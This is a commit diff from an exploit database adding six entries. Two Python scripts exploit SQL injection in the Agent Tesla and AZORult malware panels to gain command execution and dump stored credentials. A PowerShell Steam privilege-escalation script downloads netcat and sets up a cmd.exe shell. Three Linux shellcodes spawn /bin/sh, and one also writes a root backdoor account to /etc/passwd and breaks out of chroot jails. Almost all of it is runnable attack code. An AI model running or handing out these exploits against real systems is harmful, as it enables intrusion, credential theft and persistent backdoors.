DB: 2019-08-14
6 changes to exploits/shellcodes Steam Windows Client - Local Privilege Escalation Agent Tesla Botnet - Arbitrary Code Execution AZORult Botnet - SQL Injection Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes) Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode
This commit is contained in:
parent
a32e028b88
commit
998fb1eeec
8 changed files with 505 additions and 0 deletions
54
exploits/php/remote/47243.py
Executable file
54
exploits/php/remote/47243.py
Executable file
|
@ -0,0 +1,54 @@
|
|||
import requests
|
||||
import argparse
|
||||
import base64
|
||||
|
||||
# Agent Tesla C2 RCE by prsecurity
|
||||
# For research purposes only. Don't pwn what you don't own.
|
||||
|
||||
def get_args():
|
||||
parser = argparse.ArgumentParser(
|
||||
prog="agent_tesla_sploit.py",
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
|
||||
epilog= '''
|
||||
This script will exploit the RCE/SQL vulnerability in Agent Tesla Dashboard.
|
||||
''')
|
||||
parser.add_argument("target", help="URL of WebPanel (ex: http://target.com/WebPanel/)")
|
||||
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
|
||||
parser.add_argument("-p", "--proxy", default="socks5://localhost:9150", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
|
||||
args = parser.parse_args()
|
||||
return args
|
||||
|
||||
def pwn_target(target, command, proxy):
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
proxies = {'http': proxy, 'https': proxy}
|
||||
print('[*] Probing...')
|
||||
get_params = {
|
||||
'table':'screens',
|
||||
'primary':'HWID',
|
||||
'clmns':'a:1:{i:0;a:3:{s:2:"db";s:4:"HWID";s:2:"dt";s:4:"HWID";s:9:"formatter";s:4:"exec";}}',
|
||||
'where': base64.b64encode("1=1 UNION SELECT \"{}\"".format(command).encode('utf-8'))
|
||||
}
|
||||
target = target + '/server_side/scripts/server_processing.php'
|
||||
try:
|
||||
r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
|
||||
print("[*] Your IP: {}".format(r.text))
|
||||
headers = {
|
||||
"User-agent":"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
|
||||
}
|
||||
r = requests.get(target, params=get_params, headers=headers, verify=False, proxies=proxies)
|
||||
result = r.json()['data'][-1]['HWID']
|
||||
print('[+] {}'.format(result))
|
||||
except:
|
||||
print("[-] ERROR: Something went wrong.")
|
||||
print(r.text)
|
||||
raise
|
||||
|
||||
def main():
|
||||
print ()
|
||||
print ('Agent Tesla RCE by prsecurity.')
|
||||
args = get_args()
|
||||
pwn_target(args.target.strip(), args.command.strip(), args.proxy.strip())
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
95
exploits/php/remote/47244.py
Executable file
95
exploits/php/remote/47244.py
Executable file
|
@ -0,0 +1,95 @@
|
|||
import requests
|
||||
import argparse
|
||||
import base64
|
||||
|
||||
# Azorult 3.3.1 C2 SQLi by prsecurity
|
||||
# For research purposes only. Don't pwn what you don't own.
|
||||
# change GUID and XOR key to specific beacon, can be extracted from a sample
|
||||
|
||||
guid = "353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F"
|
||||
key = "\x03\x55\xae"
|
||||
|
||||
def get_args():
|
||||
parser = argparse.ArgumentParser(
|
||||
prog="azorult_sploit.py",
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
|
||||
epilog= '''
|
||||
This script will exploit the SQL vulnerability in Azorult 3.3.1 Dashboard.
|
||||
''')
|
||||
parser.add_argument("target", help="URL of index.php (ex: http://target.com/index.php)")
|
||||
parser.add_argument("-n", "--id_record", default="1", help="id of record to dump")
|
||||
parser.add_argument("-p", "--proxy", default="http://localhost:8080", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = tor)")
|
||||
args = parser.parse_args()
|
||||
return args
|
||||
|
||||
def CB_XORm(data, key):
|
||||
j=0
|
||||
key = list(key)
|
||||
data = list(data)
|
||||
tmp = list()
|
||||
for i in range(len(data)):
|
||||
tmp.append(chr(ord(data[i])^ord(key[j])))
|
||||
j += 1
|
||||
if j > (len(key)-1):
|
||||
j = 0
|
||||
return "".join(tmp)
|
||||
|
||||
def pwn_target(target, num_records, proxy):
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
proxies = {'http': proxy, 'https': proxy}
|
||||
|
||||
try:
|
||||
r = requests.get("http://bot.whatismyipaddress.com", proxies=proxies)
|
||||
print("[*] Your IP: {}".format(r.text))
|
||||
headers = {
|
||||
"Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
|
||||
}
|
||||
print('[+] Getting URL, LOGIN AND PASS')
|
||||
data = [
|
||||
"|".join([
|
||||
"1","2","3","4","5","6","7","8","9","10","11","12"
|
||||
]),
|
||||
"\r\n".join([
|
||||
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p2) from passwords limit {},1) dumb),333,4,5,6,7), (111,(select * from (select concat({},0x3a,p_p3) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records,num_records, num_records)])
|
||||
]),
|
||||
"c",
|
||||
"d",
|
||||
":".join(["'11","22"])
|
||||
]
|
||||
payload = CB_XORm(guid.join(data), key)
|
||||
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
|
||||
if r.text != "OK":
|
||||
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
|
||||
raise
|
||||
print('[+] Getting LOGIN/PASS')
|
||||
data = [
|
||||
"|".join([
|
||||
"1","2","3","4","5","6","7","8","9","10","11","12"
|
||||
]),
|
||||
"\r\n".join([
|
||||
"|".join(["1","2","3","4"," "*255+"'", ", (select version())), (111,(select * from (select concat({},0x3a,p_p1) from passwords limit {},1) dumb),333,4,5,6,7) -- ".format(num_records, num_records)])
|
||||
]),
|
||||
"c",
|
||||
"d",
|
||||
":".join(["'11","22"])
|
||||
]
|
||||
payload = CB_XORm(guid.join(data), key)
|
||||
r = requests.post(target, data=payload, headers=headers, verify=False, proxies=proxies)
|
||||
if r.text != "OK":
|
||||
print("[-] ERROR: Something went wrong. Maybe Azorult version is not 3.3.1?")
|
||||
raise
|
||||
print('[+] If this worked, you will see two new records in password table at guest.php')
|
||||
except:
|
||||
print("[-] ERROR: Something went wrong.")
|
||||
print(r.text)
|
||||
raise
|
||||
|
||||
def main():
|
||||
print ()
|
||||
print ('Azorult 3.3.1 SQLi by prsecurity')
|
||||
args = get_args()
|
||||
pwn_target(args.target.strip(), args.num_records.strip(), args.proxy.strip())
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
30
exploits/windows/local/47238.ps1
Normal file
30
exploits/windows/local/47238.ps1
Normal file
|
@ -0,0 +1,30 @@
|
|||
$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
|
||||
$MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver"
|
||||
$RegDir = "C:\Windows\Temp\RegLN.exe"
|
||||
$PayDir = "C:\Windows\Temp\payload.exe"
|
||||
$Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e cmd.exe"
|
||||
$PayDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/nc.exe"
|
||||
$RegDownload = "https://raw.githubusercontent.com/AbsoZed/SteamPrivEsc/master/RegLN.exe"
|
||||
$WebClient = New-Object System.Net.WebClient
|
||||
|
||||
|
||||
If(!((Test-Path -Path $RegDir) -And (Test-Path -Path $PayDir)))
|
||||
{
|
||||
$WebClient.DownloadFile($PayDownload, $PayDir)
|
||||
$WebClient.DownloadFile($RegDownload, $RegDir)
|
||||
}
|
||||
|
||||
If(Get-ItemProperty -Path $SteamRegKey -Name ImagePath -ErrorAction SilentlyContinue)
|
||||
{
|
||||
Start-Service -DisplayName "Steam Client Service"
|
||||
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
|
||||
Start-Service -Name "msiserver"
|
||||
}
|
||||
Else
|
||||
{
|
||||
Remove-Item -Path $SteamRegKey -Recurse
|
||||
Start-Process -FilePath $RegDir -ArgumentList "HKLM\Software\Wow6432Node\Valve\Steam\NSIS HKLM\SYSTEM\CurrentControlSet\Services\msiserver"
|
||||
Start-Service -DisplayName "Steam Client Service"
|
||||
Set-ItemProperty -Path $MSIRegKey -Name "ImagePath" -Value $Payload
|
||||
Start-Service -Name "msiserver"
|
||||
}
|
|
@ -10631,6 +10631,7 @@ id,file,description,date,author,type,platform,port
|
|||
47174,exploits/multiple/local/47174.sh,"ASAN/SUID - Local Privilege Escalation",2019-01-12,bcoles,local,multiple,
|
||||
47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
|
||||
47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
|
||||
47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -17603,6 +17604,8 @@ id,file,description,date,author,type,platform,port
|
|||
47228,exploits/multiple/remote/47228.rb,"ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
|
||||
47229,exploits/multiple/remote/47229.rb,"ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)",2019-08-12,AkkuS,remote,multiple,
|
||||
47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
|
||||
47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
|
||||
47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -993,3 +993,6 @@ id,file,description,date,author,type,platform
|
|||
47200,shellcodes/linux_x86/47200.c,"Linux/x86 - chmod(/etc/shadow_ 0666) Polymorphic Shellcode (53 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47201,shellcodes/linux_x86/47201.c,"Linux/x86 - ASLR Disable Polymorphic Shellcode (107 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47202,shellcodes/linux_x86/47202.c,"Linux/x86 - Force Reboot Shellcode (51 bytes)",2019-08-01,"Daniel Ortiz",shellcode,linux_x86
|
||||
47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",shellcode,linux
|
||||
47240,shellcodes/linux_x86/47240.S,"Linux/x86 - execve(_/bin/sh_) + tolower() Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
|
||||
47242,shellcodes/linux_x86/47242.asm,"Linux/x86 - Multiple In-Memory Modules (Prompt + Privilege Restore + Break Chroot Jail + Backdoor) + Signature Evasion Shellcode",2019-03-23,"Hacker House",shellcode,linux_x86
|
||||
|
|
|
49
shellcodes/linux/47239.c
Normal file
49
shellcodes/linux/47239.c
Normal file
|
@ -0,0 +1,49 @@
|
|||
/* Alpha (AXP) Linux/Tru64 execve() shellcode
|
||||
* ==========================================
|
||||
* This shellcode uses the stack to store a generated
|
||||
* "callsys" instruction, due to this it needs executable
|
||||
* stack. To test on Linux use "execstack -s <bin>" and
|
||||
* on Tru64 use "sysconfig -r proc executable_stack=1".
|
||||
*
|
||||
* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
|
||||
*
|
||||
* -- Hacker Fantastic (https://hacker.house)
|
||||
*/
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
unsigned char shellcode[] = {
|
||||
"\x80\xff\xde\x23" /* lda $sp,-128($sp) */
|
||||
"\x73\x68\x3f\x24" /* ldil $1, 0x68732f2f */
|
||||
"\x2f\x2f\x21\x20" /* sll $1, 0x20 */
|
||||
"\x21\x17\x24\x48" /* ldil $2, 0x6e69622f */
|
||||
"\x69\x6e\x5f\x24" /* addq $1, $2, $1 */
|
||||
"\x2f\x62\x42\x20" /* stq $31, -32($sp) */
|
||||
"\x01\x04\x22\x40" /* stq $31, -24($sp) */
|
||||
"\xe0\xff\xfe\xb7" /* stq $31, -8($sp) */
|
||||
"\xe8\xff\xfe\xb7" /* stq $1, -16($sp) */
|
||||
"\xf8\xff\xfe\xb7" /* mov $sp, $16 */
|
||||
"\xf0\xff\x3e\xb4" /* subq $16, 0x10, $16 */
|
||||
"\x10\x04\xfe\x47" /* stq $16, -40($sp) */
|
||||
"\x30\x15\x02\x42" /* mov $sp, $17 */
|
||||
"\xd8\xff\x1e\xb6" /* subq $17, 0x28, $17 */
|
||||
"\x11\x04\xfe\x47" /* mov $sp, $18 */
|
||||
"\x31\x15\x25\x42" /* subq $18, 0x18, $18 */
|
||||
"\x12\x04\xfe\x47" /* ldil $0, 0xffffff3c */
|
||||
"\x32\x15\x43\x42" /* ldil $1, 0xffffff01 */
|
||||
"\x3c\xff\x1f\x20" /* subq $0, $1, $0 */
|
||||
"\x01\xff\x3f\x20" /* ldil $1, 0xffffff84 */
|
||||
"\x20\x05\x01\x40" /* ldil $2, 0xffffff01 */
|
||||
"\x84\xff\x3f\x20" /* subq $1, $2, $1 */
|
||||
"\x01\xff\x5f\x20" /* stl $1, -48($sp) */
|
||||
"\x21\x05\x22\x40" /* subq $sp, 0x30, $sp */
|
||||
"\xd0\xff\x3e\xb0" /* jmp $sp,($sp),0xff10 */
|
||||
"\x3e\x15\xc6\x43"
|
||||
"\xc4\x3f\xde\x6b"
|
||||
};
|
||||
|
||||
int main(){
|
||||
int (*func)();
|
||||
func = (int (*)())shellcode;
|
||||
func();
|
||||
}
|
67
shellcodes/linux_x86/47240.S
Normal file
67
shellcodes/linux_x86/47240.S
Normal file
|
@ -0,0 +1,67 @@
|
|||
# tolower() execve() /bin/sh -c (user supplied command)
|
||||
# shellcode to evade tolower() and friends, requires %esi
|
||||
# to reference a valid writeable address (usually does)
|
||||
.text
|
||||
.global _start
|
||||
_start:
|
||||
jmp data
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
nop
|
||||
start:
|
||||
popl %edi
|
||||
movl %edi, %ecx
|
||||
xorl %eax,%eax
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
pushl $0x68732f2f
|
||||
pushl $0x6e69622f
|
||||
movl %esp,%ebx
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
pushw $0x632d
|
||||
movl %esp,%edi
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
movl %ecx,%eax
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
movl %edi,%eax
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
movl %ebx,%eax
|
||||
movl %eax,%es:(%esi)
|
||||
pushl %es:(%esi)
|
||||
movl %esp,%esi
|
||||
movl %esi,%ecx
|
||||
xorl %eax, %eax
|
||||
movb $0x08, %al
|
||||
addb $0x03, %al
|
||||
int $0x80
|
||||
data:
|
||||
call start
|
||||
#command
|
||||
.ascii "id"
|
204
shellcodes/linux_x86/47242.asm
Normal file
204
shellcodes/linux_x86/47242.asm
Normal file
|
@ -0,0 +1,204 @@
|
|||
;# Description: SCORE - The ShellCORE
|
||||
;# score is a complete shellcode for x86 processors running
|
||||
;# linux. It is designed to help work further with an exploited
|
||||
;# process.
|
||||
;#
|
||||
;# Coded by: prdelka
|
||||
|
||||
;#########################
|
||||
;# [CORE] #
|
||||
;#########################
|
||||
|
||||
;--- NOP Equivalent instruction
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
cld
|
||||
|
||||
;--- core initialise
|
||||
jmp $+0x06
|
||||
pop edi
|
||||
push edi
|
||||
jmp edi
|
||||
call $-0x04
|
||||
;--- core prompt
|
||||
pop edi
|
||||
push 0x3e0a7964
|
||||
push 0x61655220
|
||||
push 0x65726f43
|
||||
xor eax,eax
|
||||
mov al,0x4
|
||||
xor ebx,ebx
|
||||
mov bl,0x1
|
||||
mov ecx,esp
|
||||
xor edx,edx
|
||||
mov dl,0xc
|
||||
int 0x80
|
||||
;--- core read choice
|
||||
xor eax,eax
|
||||
mov ebp,esp
|
||||
push eax
|
||||
mov al,0x3
|
||||
xor ebx,ebx
|
||||
mov bl,0x1
|
||||
mov ecx,ebp
|
||||
xor edx,edx
|
||||
mov dl,0x2
|
||||
int 0x80
|
||||
;--- core module selector
|
||||
mov edx,ebp
|
||||
|
||||
;### [backdoor module] 'b'
|
||||
cmp word[edx],0x0a62
|
||||
je $+0x5e
|
||||
;### [break-chroot-jail module] 'j'
|
||||
cmp word[edx],0x0a6a
|
||||
je $+0x59
|
||||
;### [privilege restore module] 'p'
|
||||
cmp word[edx],0x0a70
|
||||
je $+0x37
|
||||
;### [shellcode module] 's'
|
||||
cmp word[edx],0x0a73
|
||||
je $+0x14
|
||||
;### [exit module] 'x'
|
||||
cmp word[edx],0x0a78
|
||||
je $+0x05
|
||||
;--- core loop
|
||||
push edi
|
||||
jmp edi
|
||||
|
||||
;#########################
|
||||
;# [MODULES] #
|
||||
;#########################
|
||||
|
||||
;--- [exit module]
|
||||
xor eax,eax
|
||||
mov al,0x1
|
||||
xor ebx,ebx
|
||||
int 0x80
|
||||
|
||||
;--- [shellcode module]
|
||||
xor eax,eax
|
||||
push eax
|
||||
push 0x68732f2f
|
||||
push 0x6e69622f
|
||||
mov ebx,esp
|
||||
push eax
|
||||
mov edx,esp
|
||||
push ebx
|
||||
mov ecx,esp
|
||||
mov al,0xB
|
||||
int 0x80
|
||||
;### [core loop]
|
||||
push edi
|
||||
jmp edi
|
||||
|
||||
;--- [privilege restore module]
|
||||
xor eax,eax
|
||||
mov ah,0x17
|
||||
shr eax,0x8
|
||||
xor ebx,ebx
|
||||
int 0x80
|
||||
xor eax,eax
|
||||
mov ah,0x2e
|
||||
shr eax,0x8
|
||||
xor ebx,ebx
|
||||
int 0x80
|
||||
;### [core loop]
|
||||
push edi
|
||||
jmp edi
|
||||
|
||||
;### [LONG backdoor module jump]
|
||||
jmp $+0x46
|
||||
|
||||
;--- [break-chroot-jail]
|
||||
xor eax,eax
|
||||
push eax
|
||||
push 0x6c69616a
|
||||
mov ebx,esp
|
||||
mov edx,esp
|
||||
mov cx,0x2F3
|
||||
mov al,0x27
|
||||
int 0x80
|
||||
xor eax,eax
|
||||
push eax
|
||||
mov ebx,edx
|
||||
mov al,0x3d
|
||||
int 0x80
|
||||
push 0x2e2e2e2e
|
||||
mov ebx,esp
|
||||
add bl,0x2
|
||||
mov edx,ebx
|
||||
xor ecx,ecx
|
||||
mov cl,0xff
|
||||
mov al,0x0c
|
||||
mov ebx,edx
|
||||
int 0x80
|
||||
loop $-0x06
|
||||
mov ebx,edx
|
||||
add bl,0x1
|
||||
mov al,0x3d
|
||||
int 0x80
|
||||
;### [core loop]
|
||||
push edi
|
||||
jmp edi
|
||||
|
||||
;--- [backdoor module]
|
||||
xor eax,eax
|
||||
push eax
|
||||
push 0x64777373
|
||||
push 0x61702f2f
|
||||
push 0x6374652f
|
||||
mov esi,esp
|
||||
xor edx,edx
|
||||
xor ecx,ecx
|
||||
mov cl,0x01
|
||||
mov ebx,esi
|
||||
xor eax,eax
|
||||
mov al,0x5
|
||||
int 0x80
|
||||
push eax
|
||||
mov esi,esp
|
||||
xor eax,eax
|
||||
mov al,0x13
|
||||
mov ebx,[esi]
|
||||
xor ecx,ecx
|
||||
xor edx,edx
|
||||
mov dl,0x2
|
||||
int 0x80
|
||||
xor eax,eax
|
||||
mov al,0x4
|
||||
mov ebx,[esi]
|
||||
xor ecx,ecx
|
||||
push ecx
|
||||
push 0x0a687361
|
||||
push 0x622f6e69
|
||||
push 0x622f3a74
|
||||
push 0x6f6f722f
|
||||
push 0x3a676663
|
||||
push 0x20726f66
|
||||
push 0x20726573
|
||||
push 0x75206d65
|
||||
push 0x74737973
|
||||
push 0x3a303a30
|
||||
push 0x3a3a6766
|
||||
push 0x63737973
|
||||
mov ecx,esp
|
||||
xor edx,edx
|
||||
mov dl,0x30
|
||||
int 0x80
|
||||
xor eax,eax
|
||||
mov al,0x6
|
||||
mov ebx,[esi]
|
||||
int 0x80
|
||||
;### [core loop]
|
||||
push edi
|
||||
jmp edi
|
Loading…
Add table
Reference in a new issue